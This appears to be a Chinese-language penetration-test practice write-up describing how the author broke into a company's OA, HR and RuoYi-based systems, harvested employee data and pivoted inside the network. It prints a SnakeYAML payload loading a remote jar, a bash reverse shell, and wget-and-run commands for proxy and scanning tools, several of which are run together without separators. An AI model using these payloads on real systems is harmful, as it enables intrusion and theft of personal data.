某次項目練手記錄

題記

最近做了一個項目，復盤以后感覺大佬就是大佬，比不了比不了。

我的思路

目標有3天半時間，半天信息收集，1天打外網，2天內網。首先通過收集到的信息通過脆弱點找內網突破口，找到突破口對內網進行測試。

Web端找入侵點

在外網發現OA系統與一個物業管理系統綁在一個ip地址上。在物業管理系統發現登陸賬戶上用戶名寫在頁面上。

通過爆破發現存在弱口令，進入后臺。

Getshell失敗，放棄，好吧，是因為這個站太卡了，頁面定時刷新，太惡心。

轉到OA系統，通過爆破，成功爆破出一個賬戶，進入OA。進入OA后有一些好處，一個是有很多關聯系統直接進入使用，另一個是可以獲取OA里所有用戶的信息對其他系統爆破，還有一個是翻閱OA里文件發現一些系統與一些默認密碼，更甚者可以翻到vpn等信息。

通過OA可直接訪問金蝶系統，郵箱系統。

在OA通過翻閱文檔發現是共享采購平臺用員工名字（在OA導出員工信息，把中文名用在線工具轉成拼音）縮寫，爆破，爆破出弱口令。

且此平臺存在任意文件下載，下載到Linux密碼文件。

Getshell點找找，都沒找到，他們系統有一個特點，能傳木馬但是不解析，后續拿權發現目標網站全部都是jar包起的站點，是不能通過上傳webshell提權的，只能內存馬或者命令執行反彈shell。

后續外網又爆破了一堆后臺，這里不一一列舉了。下面寫兩個其他系統。

1、工廠管理系統（若依二開）

通過爆破拿到普通用戶權限，在修改個人資料處發現越權漏洞。可以遍歷所有用戶信息，于是猜想修改密碼處有越權。

成功越權修改密碼，他對原密碼并沒有效驗。使用管理員登錄后臺發現1萬多信息，把運維人員，管理層人員，承運商信息，開發人員信息全部導出用于后續攻擊。

本來想利用定時任務反彈shell的，經測試失敗，他的定時任務沒有填字符串的地方。

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://xxx/payload-v2.jar"]]]]')

2、人事系統

前面拿到人事系統人員信息，利用拿到的信息定向爆破（使用工號登錄后臺），成功爆破出hr后臺密碼，拿到全部人員信息。

外網進內網的點

目標大量使用若依框架二開的站點，眾所周知，若依使用了shiro的框架。所以他外網存在3,4個shiro反序列化漏洞。

這里我是利用一個上傳nps代理進內網，一個上傳fscan進行掃描，一個windows上線cs抓系統密碼，瀏覽器密碼。

1、上傳nps代理進內網

mkdir ../test

本來我想用ew正向代理進去的，后來發現我不知道他的ip，這時候才知道大佬們為啥喜歡用nps，確實方便管理。

wget -P ../test http://xxx/ew_linux_x64chmod 777 ../test/ew_linux_x64../test/ew_linux_x64 -s ssocksd -l 9000

運行nps：

wget -P ../test http://ip/linux_amd64_client.tar.gztar -zxvf ../test/linux_amd64_client.tar.gz -C ../test../test/npc -server=ip:8024 -vkey=4z4oardkqdtu4ro6 -type=tcp

2、反彈shell

shiro拿到權限之后，經測試echo 'bash -i >& /dev/tcp/ip/7778 0>&1' > ../test/1.sh是不行的。最優解是先寫好1.sh，然后控制肉雞遠程下載1.sh。

Vps監聽端口：nc -nlvp 7778wget -P ../test http://xxx/1.sh../test/1.sh

上傳fscan到目標上，本地掛代理掃會出各種各樣問題。

wget -P ../test http://xxx/fscan_amd64../test/fscan_amd64 -h ip/16 -p 80 -np -nopoc -o b.txt

先探測存活的網段。

../test/fscan_amd64 -hf ip.txt -np -nopoc -o ip-c.txt

漏洞挖掘。

3、windows上線cs抓系統密碼，瀏覽器密碼。

翻到一些系統的管理員密碼。登錄后臺。

內網橫向

因為時間太短，內網我的成果不是很多。下面主要記錄內網經常要用到的思路。

內網資產搜集；多關注windows系統，可以用永恒之藍滲透；關注nacos、vmware等可控制大部分主機的系統；利用漏洞獲取數據庫，系統密碼，然后利用密碼對跑出的22，3306，1433，445等端口進行密碼撞庫。

大佬思路

1、重點找運維人員的信息。

其他技術問題

1、拿到服務器權限發現是jar包起的web站點。

這時候可以吧jar包復制到其他目錄，然后后綴改成zip，解壓后就可以拿到配置文件，翻數據庫密碼。